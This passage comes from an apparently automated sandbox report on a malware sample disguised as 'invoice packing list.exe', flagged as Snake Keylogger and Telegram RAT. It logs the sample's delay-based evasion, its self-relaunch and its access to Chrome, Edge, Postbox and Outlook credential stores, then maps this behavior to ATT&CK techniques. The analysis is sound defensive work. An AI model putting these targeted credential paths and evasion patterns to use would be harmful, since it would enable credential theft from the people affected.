          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -599078s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598969s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598441s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598323s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598182s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -598074s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597969s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597860s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597235s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -597110s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596860s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596235s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -596110s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595860s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595235s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -595110s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594860s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -594110s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -593985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exe TID: 6352Thread sleep time: -593860s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 599078Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598969Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598441Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598323Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598182Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 598074Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597969Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 597110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 593860Jump to behavior
          Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd50c266b4e61c<
          Source: invoice packing list.exe, 00000005.00000002.4489346212.0000000001165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Users\user\Desktop\invoice packing list.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Users\user\Desktop\invoice packing list.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4490656225.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4490656225.0000000003228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\invoice packing list.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\invoice packing list.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4490656225.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4490656225.0000000003228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		11
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		1
          Query Registry          		Remote Services1
          Email Collection          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Input Capture          		1
          Security Software Discovery          		Remote Desktop Protocol1
          Input Capture          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin Shares11
          Archive Collected Data          		1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object Model1
          Data from Local System          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSync13
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.